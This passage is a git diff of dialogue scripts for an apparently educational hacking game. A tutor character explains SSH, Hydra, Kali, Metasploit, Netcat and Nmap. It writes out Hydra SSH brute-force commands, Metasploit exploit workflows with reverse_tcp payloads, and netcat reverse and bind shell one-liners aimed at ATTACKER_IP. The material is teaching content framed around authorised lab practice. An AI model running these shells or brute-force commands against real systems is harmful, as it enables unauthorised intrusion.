popular - 14 million passwords from breaches -Tech Instructor: **Phase 2 - Vulnerability Analysis:** Identifying weaknesses in systems and applications. + Haxolottle: It's gzipped, unzip with: gunzip /usr/share/wordlists/rockyou.txt.gz -Tech Instructor: **Phase 3 - Exploitation:** Actually compromising systems using identified vulnerabilities. ++ [How fast is it?] + Haxolottle: Depends on the service and your connection. -Tech Instructor: **Phase 4 - Post-Exploitation:** What you do after gaining access. Maintaining access, pivoting, data exfiltration. + Haxolottle: Local services: thousands of attempts per second -Tech Instructor: The Applications menu mirrors this structure. When you need a tool, think about which phase you're in, and browse that category. + Haxolottle: Remote SSH: dozens per second (network latency) -Tech Instructor: You'll also quickly learn the handful of tools you use constantly. Nmap, Metasploit, Burp Suite, Wireshark—these become second nature. + Haxolottle: Use -t flag to increase parallel tasks: hydra -t 4 ... -~ instructor_rapport += 5 --> linux_training_hub ++ [Isn't this illegal?] + Haxolottle: Only against systems you don't have permission to test! -// =========================================== -// SSH - SECURE SHELL -// =========================================== + Haxolottle: On your own systems or with written authorization, it's legal security testing. -=== ssh_intro === -~ ssh_discussed = true -~ instructor_rapport += 5 + Haxolottle: Without permission, it's unauthorized access - very illegal. -Tech Instructor: SSH - Secure Shell. Encrypted remote access to systems. One of your most critical tools. ++ [I understand] + -> linux_hub -Tech Instructor: SSH lets you securely connect to remote Linux systems and execute commands as if you were sitting at that machine. All traffic is encrypted, protecting against eavesdropping. +- -> linux_hub -Tech Instructor: Basic usage: "ssh username@ip_address" +=== kali_linux === +Haxolottle: Kali Linux - the security professional's distro. -Tech Instructor: The server typically listens on port 22. When you connect, you authenticate (usually with password or key), and then you have a remote shell. +~ haxolottle_rapport += 5 -Tech Instructor: SSH replaced older, insecure protocols like Telnet and rlogin, which transmitted passwords in cleartext. Never use those—always use SSH. +Haxolottle: It's Debian-based but comes pre-loaded with hundreds of security tools. -* [Tell me about SSH keys] - You: What about SSH key authentication? - -> ssh_keys -* [What's X11 forwarding?] - ~ ssh_x_forwarding_discussed = true - You: I saw something about -X flag for forwarding? - -> ssh_x_forwarding -* [How do I verify I'm connecting to the right server?] - You: How do I know I'm not being man-in-the-middled? - -> ssh_fingerprints -* [Let's talk about attacking SSH] - You: How do we test SSH security? - -> ssh_to_hydra_transition -* [Got the basics] - ~ completed_ssh_challenge = true - -> linux_training_hub ++ [What makes Kali special?] + Haxolottle: All the tools you need, already installed and configured: -=== ssh_keys === -~ instructor_rapport += 10 + Haxolottle: Network scanners (Nmap), exploitation frameworks (Metasploit), password crackers (John, Hashcat, Hydra) -Tech Instructor: SSH keys are asymmetric cryptography for authentication. Much more secure than passwords. + Haxolottle: Web testing tools (Burp Suite, OWASP ZAP, Nikto), wireless tools (Aircrack-ng) -Tech Instructor: You generate a key pair: a private key (keep secret) and public key (share freely). + Haxolottle: Forensics tools, reverse engineering tools, you name it. -Tech Instructor: Generate keys: "ssh-keygen -t rsa -b 4096" + Haxolottle: Saves you hours of setup time. -Tech Instructor: Copy public key to server: "ssh-copy-id user@server" ++ [Should I use Kali as my main OS?] + Haxolottle: Nah, don't do that. -Tech Instructor: Now you can SSH without typing passwords. The private key proves your identity. + Haxolottle: Kali is meant for security work, not daily use. -Tech Instructor: Benefits: stronger than passwords, can't be bruteforced, can be passphrase-protected, can be revoked per-server. + Haxolottle: Run it in a VM, or dual-boot, or use a live USB. -Tech Instructor: Many organizations require key-based auth and disable password authentication entirely. Learn this workflow. + Haxolottle: You don't want to browse the web and check email as root with all these attack tools. -~ instructor_rapport += 10 --> ssh_intro ++ [What's the default password?] + Haxolottle: Newer Kali: username "kali", password "kali" -=== ssh_x_forwarding === -~ instructor_rapport += 8 + Haxolottle: Older versions: username "root", password "toor" -Tech Instructor: X11 forwarding is clever. Linux graphical applications use the X Window System. SSH can tunnel X11 traffic. + Haxolottle: Change these immediately if you're using Kali seriously! -Tech Instructor: Connect with: "ssh -X user@server" ++ [Tell me about some specific tools] + Haxolottle: We've got separate discussions for the big ones. -Tech Instructor: Now you can run graphical programs on the remote server, but see them on your local screen. The program runs remotely, but displays locally. + Haxolottle: Ask me about Nmap for scanning, Metasploit for exploitation, or specific tools you're curious about. -Tech Instructor: Example: "kate" opens the text editor, running on the remote system but displaying on yours. Useful for accessing GUI tools remotely. ++ [Got it] + -> linux_hub -Tech Instructor: Warning: some latency over networks. And it does expose some security risks—only use on trusted connections. - -~ instructor_rapport += 5 --> ssh_intro - -=== ssh_fingerprints === -~ instructor_rapport += 10 - -Tech Instructor: Excellent security awareness. SSH uses host key fingerprints to prevent man-in-the-middle attacks. - -Tech Instructor: When you first connect, SSH shows the server's fingerprint. You should verify this matches the real server before accepting. - -Tech Instructor: On the server, check fingerprint: "ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub" - -Tech Instructor: If the fingerprint matches what SSH showed you, type "yes". SSH remembers this and will warn if it changes later. - -Tech Instructor: If the fingerprint changes unexpectedly, that's a warning sign. Could be a man-in-the-middle attack, or could be the server was rebuilt. Investigate before proceeding. - -Tech Instructor: Most people skip this check. Don't be most people. Especially in adversarial security contexts. - -~ instructor_rapport += 10 --> ssh_intro - -=== ssh_to_hydra_transition === -Tech Instructor: Now you're thinking like a penetration tester. Let's talk about attacking SSH. --> hydra_intro - -// =========================================== -// HYDRA - SSH ATTACKS -// =========================================== - -=== hydra_intro === -~ hydra_discussed = true -~ instructor_rapport += 5 - -Tech Instructor: Hydra. THC-Hydra, to be specific. A parallelized login cracker supporting numerous protocols. - -Tech Instructor: Hydra performs **online bruteforce attacks**—it actually tries to log in with username/password combinations. Different from offline attacks where you crack hashed passwords. - -Tech Instructor: Basic usage: "hydra -l username -p password target ssh" - -Tech Instructor: Tests a single username/password combo. But Hydra's power is testing many combinations from wordlists. - -Tech Instructor: Supports dozens of protocols: SSH, FTP, HTTP, RDP, SMB, databases, and more. If it accepts login credentials, Hydra can probably attack it. - -* [How do I use wordlists?] - ~ bruteforce_basics_discussed = true - You: How do I test multiple passwords? - -> hydra_wordlists -* [How fast is Hydra?] - You: How quickly can it crack passwords? - -> hydra_speed -* [What are the legal/ethical considerations?] - You: Is this legal to use? - -> hydra_ethics -* [I'm ready to try it] - ~ completed_hydra_challenge = true - -> linux_training_hub - -=== hydra_wordlists === -~ instructor_rapport += 10 - -Tech Instructor: Wordlists are the fuel for Hydra. Collections of common passwords to test. - -Tech Instructor: Usage: "hydra -l username -P /path/to/wordlist.txt target ssh" - -Tech Instructor: Capital -P for password list, lowercase -l for single username. Or use -L for username list too. - -Tech Instructor: Kali includes wordlists: "ls /usr/share/wordlists/seclists/Passwords/" - -Tech Instructor: **Choosing the right wordlist is critical.** A wordlist with 10 million passwords might take days for online attacks. Start with smaller, curated lists of common passwords. - -Tech Instructor: For SSH specifically, "Common-Credentials" lists work well. They contain default passwords and common weak passwords. - -Tech Instructor: Real-world advice: online attacks are slow and noisy. They generate logs. They trigger intrusion detection. Use them strategically, not as your first approach. - -~ completed_hydra_challenge = true -~ instructor_rapport += 10 --> linux_training_hub - -=== hydra_speed === -~ instructor_rapport += 8 - -Tech Instructor: Speed depends on many factors: network latency, server response time, number of parallel connections. - -Tech Instructor: Hydra's "-t" flag controls parallel tasks. "hydra -t 4" uses 4 parallel connections. - -Tech Instructor: More isn't always better. Too many parallel connections can crash services or trigger rate limiting. For SSH, 4-16 threads is usually reasonable. - -Tech Instructor: Realistic expectations: online SSH bruteforce might test 10-50 passwords per second. Against a wordlist with 10,000 passwords, that's several minutes at best. - -Tech Instructor: Compare to offline cracking (like hashcat on GPUs), which can test billions of passwords per second. Online attacks are fundamentally slower. - -Tech Instructor: Strategic implication: online attacks work best when you have good intelligence. If you know username is "admin" and password is probably from a short list of defaults, Hydra excels. Blind bruteforce against random accounts? Impractical. - -~ instructor_rapport += 8 --> linux_training_hub - -=== hydra_ethics === -~ instructor_rapport += 10 - -Tech Instructor: Critical question. Shows good judgment. - -Tech Instructor: **Legal status:** Hydra itself is legal to possess and use in authorized security testing. Unauthorized use against systems you don't own or have explicit permission to test? That's computer fraud. Felony-level crime in most jurisdictions. - -Tech Instructor: **In this training:** You're attacking lab systems we control, with explicit permission. This is legal and ethical training. - -Tech Instructor: **In SAFETYNET operations:** You'll have authorization for your targets. Still legally gray area, but covered by classified operational authorities. - -Tech Instructor: **In the real world:** Never, ever use these tools against systems without written authorization. Penetration testers get contracts. Bug bounty hunters follow program rules. Hobbyists practice in their own isolated labs. - -Tech Instructor: The skills you're learning are powerful. Use them responsibly. With authorization. Within the law. That's not optional—it's core to professional security work. - -~ instructor_rapport += 15 --> linux_training_hub - -// =========================================== -// COMMANDS REFERENCE -// =========================================== +- -> linux_hub === commands_reference === -~ instructor_rapport += 5 +Haxolottle: Here's a quick reference of essential Linux commands. -Tech Instructor: Here's your essential commands quick reference: +~ haxolottle_rapport += 3 -Tech Instructor: **Navigation:** -- pwd (print working directory) -- ls, ls -la (list files, detailed) -- cd directory (change directory) -- cd .. (up one level), cd (home) +Haxolottle: **Navigation & Files:** -Tech Instructor: **File Operations:** -- mkdir (make directory) -- cp source dest (copy), cp -r (recursive) -- mv old new (move/rename) -- cat filename (display file) -- less filename (scrollable view) -- echo "text" (print text) +Haxolottle: pwd (where am I), ls (list files), cd (change directory) -Tech Instructor: **Getting Help:** -- man command (manual page) -- info command (info page) -- command --help (quick help) +Haxolottle: cat (show file), less (page through file), head/tail (first/last lines) -Tech Instructor: **Text Processing:** -- grep pattern (filter lines) -- sort (sort lines) -- uniq (remove duplicates) -- head, tail (first/last lines) -- wc -l (count lines) +Haxolottle: cp (copy), mv (move/rename), rm (delete), mkdir (make directory) -Tech Instructor: **Networking:** -- ifconfig, ip a s (show interfaces) -- hostname -I (show IP) -- ssh user@host (remote shell) -- ssh -X user@host (X11 forwarding) +Haxolottle: **Text Processing:** -Tech Instructor: **Security Tools:** -- hydra -l user -p pass target ssh (test SSH login) -- hydra -l user -P wordlist target ssh (bruteforce SSH) +Haxolottle: grep (search), sort (sort lines), uniq (remove duplicates) -+ [Back to main menu] - -> linux_training_hub +Haxolottle: wc -l (count lines), cut (extract columns), sed (stream editor) -// =========================================== -// CHALLENGE TIPS -// =========================================== +Haxolottle: **System Info:** -=== challenge_tips === -~ instructor_rapport += 5 +Haxolottle: whoami (current user), id (user details), uname -a (system info) -Tech Instructor: Practical tips for the hands-on challenges: +Haxolottle: ps aux (all processes), top (live process monitor), df -h (disk space) -Tech Instructor: **For SSH practice:** -- Verify fingerprints before accepting -- Try both regular SSH and -X flag for X forwarding -- Use "exit" or Ctrl-D to disconnect -- Check "who" command to see who else is connected +Haxolottle: **Networking:** -Tech Instructor: **For Hydra attacks:** -- Start with small, targeted wordlists from /usr/share/wordlists/seclists/Passwords/Common-Credentials/ -- Use -t 4 for reasonable parallel connections -- Be patient—online attacks are slow -- Watch for successful login messages -- Remember to actually SSH in once you crack credentials +Haxolottle: ip a or ifconfig (IP address), netstat/ss (connections), ping (connectivity test) -Tech Instructor: **For finding flags:** -- Navigate to user home directories -- Use "cat" to read files -- Remember "sudo" lets you act as root (if you have permission) -- Check file permissions with "ls -la" +Haxolottle: **Remote Access:** -Tech Instructor: **General advice:** -- Use Tab completion to save typing -- Use up arrow to recall previous commands -- If stuck, check man pages -- Take notes on what works +Haxolottle: ssh user@host (connect to remote system), scp (secure copy over SSH) -+ [Back to main menu] - -> linux_training_hub +Haxolottle: **Security Tools:** -// =========================================== -// READY FOR PRACTICE -// =========================================== +Haxolottle: hydra (password attacks), nmap (network scanning - ask me about this!) -=== ready_for_practice === -~ instructor_rapport += 5 +Haxolottle: **Piping & Redirection:** -Tech Instructor: Excellent. You've covered the fundamentals. +Haxolottle: command | command (pipe output to another command) -{command_line_skills_discussed and piping_discussed and redirection_discussed and ssh_discussed and hydra_discussed: - Tech Instructor: You've reviewed all the core material. You should be well-prepared for the practical exercises. -- else: - Tech Instructor: You might want to review the topics you haven't covered yet, but you've got enough to start. -} +Haxolottle: command > file (save output to file), command >> file (append to file) -Tech Instructor: Remember: the best way to learn Linux is by doing. Read the challenges, try commands, make mistakes, figure out fixes. That's how you build real competence. ++ [Tell me about Nmap] + INCLUDE tools/nmap_basics.ink -> nmap_what_is_it -Tech Instructor: Practical objectives: -1. Practice basic command-line navigation and file manipulation -2. Edit files with vi -3. Use piping and redirection -4. SSH between systems -5. Use Hydra to crack weak SSH credentials -6. Capture flags from compromised accounts ++ [Tell me about Metasploit] + INCLUDE tools/metasploit_basics.ink -> metasploit_what_is_it -Tech Instructor: The lab environment is yours to experiment in. Break things. It's a safe space for learning. ++ [Tell me about Netcat] + INCLUDE tools/netcat_basics.ink -> netcat_what_is_it -{instructor_rapport >= 50: - Tech Instructor: You've asked great questions and engaged deeply with the material. That's exactly the right approach. You're going to do well. -} ++ [Back to main topics] + -> linux_hub -Tech Instructor: Good luck, Agent {player_name}. You've got this. +- -> linux_hub --> end_session - -// =========================================== -// END SESSION -// =========================================== - -=== end_session === - -Tech Instructor: Whenever you need a refresher on Linux fundamentals, I'm here. - -{instructor_rapport >= 40: - Tech Instructor: You've demonstrated solid understanding and good security awareness. Keep that mindset. -} - -Tech Instructor: Now get to that terminal and start practicing. Theory is useful, but hands-on experience is how you actually learn. - -Tech Instructor: See you in the field, Agent. - -#exit_conversation -> END diff --git a/story_design/ink/game_scenarios/tools/metasploit_basics.ink b/story_design/ink/game_scenarios/tools/metasploit_basics.ink new file mode 100644 index 0000000..65950eb --- /dev/null +++ b/story_design/ink/game_scenarios/tools/metasploit_basics.ink @@ -0,0 +1,148 @@ +// Metasploit Framework - Reusable Explanations +// Used across multiple scenarios + +=== metasploit_what_is_it === +Haxolottle: Metasploit is your exploitation toolkit, little axolotl. + +Haxolottle: It's a framework with thousands of exploits, payloads, and post-exploitation tools all in one place. + +Haxolottle: Think of it as a Swiss Army knife for hacking. + ++ [How do I start using it?] + -> metasploit_getting_started + ++ [What can it do?] + -> metasploit_capabilities + ++ [Got it] + -> DONE + +=== metasploit_getting_started === +Haxolottle: Start the console: msfconsole + +Haxolottle: It takes a moment to load - over 2000 exploits to initialize. + +Haxolottle: Once you're in, you'll see the msf > prompt. That's your command center. + ++ [How do I find exploits?] + Haxolottle: Use search: search apache or search platform:windows + + Haxolottle: You can search by name, platform, CVE number, whatever you know about the target. + + Haxolottle: Try: search cve:2021-3156 to find a specific vulnerability. + ++ [How do I use an exploit?] + -> metasploit_exploitation_workflow + ++ [Show me the basic workflow] + -> metasploit_exploitation_workflow + ++ [That's enough for now] + -> DONE + +=== metasploit_capabilities === +Haxolottle: Metasploit does it all, really. + +Haxolottle: Exploitation: Thousands of exploits for every platform - Windows, Linux, web apps, you name it. + +Haxolottle: Payloads: After exploitation, what do you want? A shell? Meterpreter? Execute a command? + +Haxolottle: Post-exploitation: Once you're in, gather info, escalate privileges, pivot to other systems. + +Haxolottle: It even has auxiliary modules for scanning, fuzzing, and denial of service. + ++ [Tell me about the workflow] + -> metasploit_exploitation_workflow + ++ [What's Meterpreter?] + -> meterpreter_intro + ++ [I get the idea] + -> DONE + +=== metasploit_exploitation_workflow === +Haxolottle: Here's the standard workflow: + +Haxolottle: 1. Search for an exploit: search distcc + +Haxolottle: 2. Select it: use exploit/unix/misc/distcc_exec + +Haxolottle: 3. Check options: show options + +Haxolottle: 4. Set required options: set RHOST 10.0.0.5 and set LHOST YOUR_IP + +Haxolottle: 5. Choose a payload: show payloads, then set PAYLOAD cmd/unix/reverse + +Haxolottle: 6. Launch: exploit or run + ++ [What's RHOST and LHOST?] + Haxolottle: RHOST is the remote host - your target's IP address. + + Haxolottle: LHOST is your local host - your Kali machine's IP, where shells connect back to. + + Haxolottle: Always double-check these before running an exploit! + ++ [What if the exploit doesn't work?] + Haxolottle: First, run show options again and verify everything is set correctly. + + Haxolottle: Check that the target is actually running the vulnerable service. + + Haxolottle: Some exploits are unreliable or version-specific. Try a different one. + ++ [Tell me about payloads] + -> metasploit_payloads + ++ [Clear enough] + -> DONE + +=== metasploit_payloads === +Haxolottle: Payloads are what happens after exploitation succeeds. + +Haxolottle: Simple shells: windows/shell/reverse_tcp or cmd/unix/reverse + +Haxolottle: These give you a basic command prompt on the target. + +Haxolottle: Meterpreter: windows/meterpreter/reverse_tcp or linux/x86/meterpreter/reverse_tcp + +Haxolottle: Meterpreter is way more powerful - file upload/download, keylogging, process migration, you name it. + ++ [When should I use which payload?] + Haxolottle: For quick access and simple commands, use regular shells. + + Haxolottle: For post-exploitation work - gathering intel, escalating privileges, pivoting - use Meterpreter. + + Haxolottle: Meterpreter is also more stable and has better error handling. + ++ [Tell me more about Meterpreter] + -> meterpreter_intro + ++ [Got it] + -> DONE + +=== meterpreter_intro === +Haxolottle: Meterpreter is Metasploit's advanced payload. + +Haxolottle: It runs entirely in memory - no files written to disk, harder to detect. + +Haxolottle: It's dynamically extensible - load features as you need them. + +Haxolottle: And it has tons of built-in commands for everything you'd want to do post-exploitation. + ++ [What commands does Meterpreter have?] + Haxolottle: Type help after getting a Meterpreter shell to see them all. + + Haxolottle: Key ones: getuid (current user), ps (processes), migrate (switch processes) + + Haxolottle: File operations: ls, cd, download, upload, cat + + Haxolottle: System: sysinfo, getprivs, shell (drop to OS shell) + ++ [How do I get a Meterpreter shell?] + Haxolottle: Just use a Meterpreter payload when exploiting. + + Haxolottle: Like: set PAYLOAD windows/meterpreter/reverse_tcp + + Haxolottle: Then exploit normally. You'll get a meterpreter > prompt instead of a system shell. + ++ [I understand] + -> DONE diff --git a/story_design/ink/game_scenarios/tools/netcat_basics.ink b/story_design/ink/game_scenarios/tools/netcat_basics.ink new file mode 100644 index 0000000..54476f3 --- /dev/null +++ b/story_design/ink/game_scenarios/tools/netcat_basics.ink @@ -0,0 +1,98 @@ +// Netcat Tool - Reusable Explanations +// Used in intro_linux and vulnerabilities scenarios + +=== netcat_what_is_it === +Haxolottle: Netcat is the Swiss Army knife of networking, little axolotl. + +Haxolottle: It can read and write data across network connections - TCP or UDP. + +Haxolottle: People call it "nc" for short, and it's on basically every Linux system. + ++ [What can I use it for?] + -> netcat_uses + ++ [How do I use it?] + -> netcat_basic_usage + ++ [Got it] + -> DONE + +=== netcat_uses === +Haxolottle: Netcat does a ton of things: + +Haxolottle: Port scanning: Check if a port is open + +Haxolottle: File transfer: Send files between systems + +Haxolottle: Banner grabbing: Connect to services and see what they say + +Haxolottle: Bind shells: Listen for connections and serve up a shell + +Haxolottle: Reverse shells: Connect back to an attacker and give them a shell + ++ [Tell me about shells] + -> netcat_shells + ++ [How do I use these features?] + -> netcat_basic_usage + ++ [I understand] + -> DONE + +=== netcat_basic_usage === +Haxolottle: Basic netcat commands: + +Haxolottle: Connect to a port: nc TARGET_IP PORT + +Haxolottle: Listen on a port: nc -l -p PORT or nc -lvp PORT + +Haxolottle: Send a file: nc -w 1 TARGET_IP PORT < file.txt + +Haxolottle: Receive a file: nc -l -p PORT > file.txt + ++ [What's the -l flag?] + Haxolottle: The -l flag means "listen" - act as a server instead of a client. + + Haxolottle: Without -l, netcat connects TO something. + + Haxolottle: With -l, netcat waits FOR something to connect. + ++ [Tell me about shells] + -> netcat_shells + ++ [That's clear] + -> DONE + +=== netcat_shells === +Haxolottle: Netcat can create shells - command line access to remote systems. + +Haxolottle: **Bind shell**: Target listens, you connect. + +Haxolottle: On target: nc -l -p 4444 -e /bin/bash (Linux) or nc.exe -l -p 4444 -e cmd.exe (Windows) + +Haxolottle: On attacker: nc TARGET_IP 4444 + +Haxolottle: **Reverse shell**: You listen, target connects to you. + +Haxolottle: On attacker: nc -l -p 4444 + +Haxolottle: On target: nc ATTACKER_IP 4444 -e /bin/bash (Linux) or nc.exe ATTACKER_IP 4444 -e cmd.exe (Windows) + ++ [Why would I use one over the other?] + Haxolottle: Bind shells are simpler but firewalls usually block incoming connections. + + Haxolottle: Reverse shells bypass firewalls because the target initiates the connection outbound. + + Haxolottle: In real attacks, reverse shells are much more reliable. + ++ [What's the -e flag doing?] + Haxolottle: The -e flag executes a program and pipes all connection data through it. + + Haxolottle: So -e /bin/bash means "run bash and send everything through this connection." + + Haxolottle: The attacker types commands, they go through netcat to bash, output comes back. + + Haxolottle: Note: Not all netcat versions support -e for security reasons. + ++ [I get it now] + -> DONE diff --git a/story_design/ink/game_scenarios/tools/nmap_basics.ink b/story_design/ink/game_scenarios/tools/nmap_basics.ink new file mode 100644 index 0000000..768ec97 --- /dev/null +++ b/story_design/ink/game_scenarios/tools/nmap_basics.ink @@ -0,0 +1,85 @@ +// Nmap Tool - Reusable Explanations +// Used across multiple scenarios + +=== nmap_what_is_it === +Haxolottle: Nmap is your eyes on the network, little axolotl. + +Haxolottle: It's a network scanner that reveals what's running on remote systems - open ports, services, even operating systems. + +Haxolottle: Every hacker starts with reconnaissance, and Nmap is the reconnaissance king. + ++ [How do I use it?] + -> nmap_basic_usage + ++ [What can it tell me?] + -> nmap_capabilities + ++ [Got it, thanks] + -> DONE + +=== nmap_basic_usage === +Haxolottle: The simplest scan: nmap TARGET_IP + +Haxolottle: This checks the 1000 most common ports. Quick and dirty. + +Haxolottle: Want more detail? Add -sV for service versions: nmap -sV TARGET_IP + +Haxolottle: Need everything? Scan all ports: nmap -p- TARGET_IP + +Haxolottle: That one takes time, but you'll find every listening service. + ++ [What about stealth?] + Haxolottle: Smart question. Use SYN scans: sudo nmap -sS TARGET_IP + + Haxolottle: They're faster and slightly stealthier than full TCP connections. + + Haxolottle: Though honestly, any halfway decent IDS will still spot you. + ++ [Tell me more about what Nmap reveals] + -> nmap_capabilities + ++ [That's what I needed] + -> DONE + +=== nmap_capabilities === +Haxolottle: Nmap tells you the attack surface - everything exposed to the network. + +Haxolottle: Open ports: Is SSH running? Web server? Database? + +Haxolottle: Service versions: Not just "SSH," but "OpenSSH 7.4" - specific enough to look up vulnerabilities. + +Haxolottle: Operating system: With -O flag, Nmap can guess if it's Windows, Linux, what version. + +Haxolottle: And with NSE scripts (--script), it can even check for specific vulnerabilities. + ++ [How do I scan for vulnerabilities?] + Haxolottle: Use the vuln script category: nmap --script vuln TARGET_IP + + Haxolottle: It's not as thorough as dedicated scanners, but it catches common issues. + ++ [Show me some useful command examples] + -> nmap_examples + ++ [I understand Nmap now] + -> DONE + +=== nmap_examples === +Haxolottle: Here are the commands I use most: + +Haxolottle: Full scan with versions: nmap -sV -p- TARGET_IP + +Haxolottle: Fast scan with OS detection: nmap -sS -O TARGET_IP + +Haxolottle: Vulnerability check: nmap --script vuln -sV TARGET_IP + +Haxolottle: Save results: nmap -sV -oA scan_results TARGET_IP + +Haxolottle: The -oA saves in all formats - normal, XML, and greppable. + ++ [What's the TARGET_IP placeholder?] + Haxolottle: Just replace it with the actual IP address you're scanning. + + Haxolottle: Like: nmap -sV 10.0.0.5 + ++ [Thanks, that's clear] + -> DONE